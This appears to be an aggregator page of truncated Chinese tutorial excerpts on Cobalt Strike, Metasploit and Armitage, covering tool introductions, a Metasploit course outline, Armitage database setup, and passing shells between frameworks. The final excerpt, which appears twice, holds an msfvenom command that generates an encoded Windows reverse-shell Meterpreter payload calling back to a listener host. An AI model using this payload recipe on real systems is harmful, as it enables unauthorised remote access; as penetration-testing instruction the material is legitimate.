armitage

Cobaltstrike系列教程(一)-简介与安装

前提是你 提交于 2020-05-01 18:23:28
0x001-Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的 渗透测试 神器,常被业界人称为CS。这款神器许多大佬们都已经玩的很6,我一个菜鸡玩的略有心得,因此写一下自己的Cobaltstrike系列文章,希望给各位一点帮助。 最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。 项目官网: https://www.cobaltstrike.com 话说这个工具的社区版是大家熟知的Armitage(一个MSF的图形化界面工具),而Cobaltstrike大家可以理解其为Armitage的商业版。 0x002-Cobaltstrike架构 本人使用的是Cabaltstrike3.13版本,虽然官方已经更新到3.14版本,但是我发现3.14版本并不稳定,因此不推荐使用 3.13版本文件架构如下。 │ Scripts 用户安装的插件 │ Log 每天的日志 │ c2lint 检查profile的错误异常 │ cobaltstrike │ cobaltstrike.jar 客户端程序 │ icon.jpg LOGO │ license.pdf

Metasploit 系列教程-(渗透测试框架)

左心房为你撑大大i 提交于 2020-04-28 06:15:43
一、 Metasploit 介绍    二、Metasploit 基础   1、Msfconsole   3、Exploits(漏洞)     使用漏洞   4、Payloads(有效载荷)     有效载荷类型     生成有效载荷   5、Databases(数据库)     使用数据库   6、Meterpreter     Meterpreter基础知识     Python扩展     Python扩展示例 三、Metasploit 信息收集   1、端口扫描   2、查找MSSQL   3、服务识别   4、密码嗅探     扩展Psnuffle   5、SNMP扫描   6、编写自己的扫描仪   7、枚举Windows修补程序 四、Metasploit 漏洞扫描   1、SMB登录检查   2、VNC认证   3、WMAP网络扫描仪   4、使用NeXpose     NeXpose通过MSFconsole   5、与Nessus合作     Nessus通过MSFconsole 五、Metasploit 写一个简单的漏洞检查工具   1、简单的TFTP漏洞检查工具   2、简单的IMAP漏洞检查工具 六、Metasploit Exploit开发(Exploit这里可理解为:漏洞,漏洞利用,渗透攻击)   1、Exploit 发展目标   2、Exploit 格式  

启动armitage

坚强是说给别人听的谎言 提交于 2020-02-17 02:12:33
小白一枚,今天照着教程启动armitage。遇到了一些问题,总是失败。 于是在网上查了解决的办法,看了几个都不行。我的错误原因是连接不上数据库。以下记录解决的过程。 1、首先,启动数据库。(kali中所有服务都不是默认开机启动的) 输入命令:/etc/init.d/postgresql start 2、初次使用数据库服务需要初始化,以便创建默认的数据库及数据库用户。 命令:msfdb init(默认创建的数据库名:msf,msf_test;用户名:msf;口令默认为空) 3、kali2.0之后启动metasploit只需启动msf 命令:msfconsole 4、进入msf后,输入命令:db_status,会说:postgresql selected,no connection 解决办法: PS:对于命令解释   msfdb init    # initialize the database   msfdb reinit    # delete and reinitialize the database   msfdb delete   # delete database and stop using it   msfdb start    # start the database   msfdb stop    # stop the database 此时我们在终端输入命令

Kali学习 | 漏洞扫描:4.1 Metasploit 的图形管理工具Armitage

回眸只為那壹抹淺笑 提交于 2019-12-28 16:03:05
Kali学习 | 漏洞扫描:4.1 Metasploit 的图形管理工具Armitage 介绍与打开Armitage工具 使用Armitage工具做渗透测试 介绍与打开Armitage工具 Armitage组件是Metasploit 框架中一个完全交互式的图形化用户接口 ,由Raphael Mudge所开发。 Armitage工具包含Metasploit控制台,通过使用其标签特性,用户可以看到多个Metasploit 控制台或多个Meterpreter会话。 (1)启动Metasploit 服务。在Kali 桌面依次选择 “应用程序” | Kali Linux l “系统服务” Metasploit | community/pro start 命令启动Metasploit服务,将输出如下所示的信息: 从输出的信息中可以看到PostgreSQL9.1数据库服务已启动,并创建了数据库用户和数据库。 (2)启动Armitage工具。在Kali桌面依次选择 “ 应用程序 ” | Kali Linux l “ 漏洞利用工具集 ” | “ 网络漏洞利用 ” l armitage 命令,如图所示。 或者在终端运行armitage命令启动Armitage工具: armitage (3)启动armitage工具后,将显示如图所示的界面。 (4)在该界面显示了连接Metasploit服务的基本信息

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

蹲街弑〆低调 提交于 2019-12-26 18:57:56
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

烈酒焚心 提交于 2019-11-29 14:42:14
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai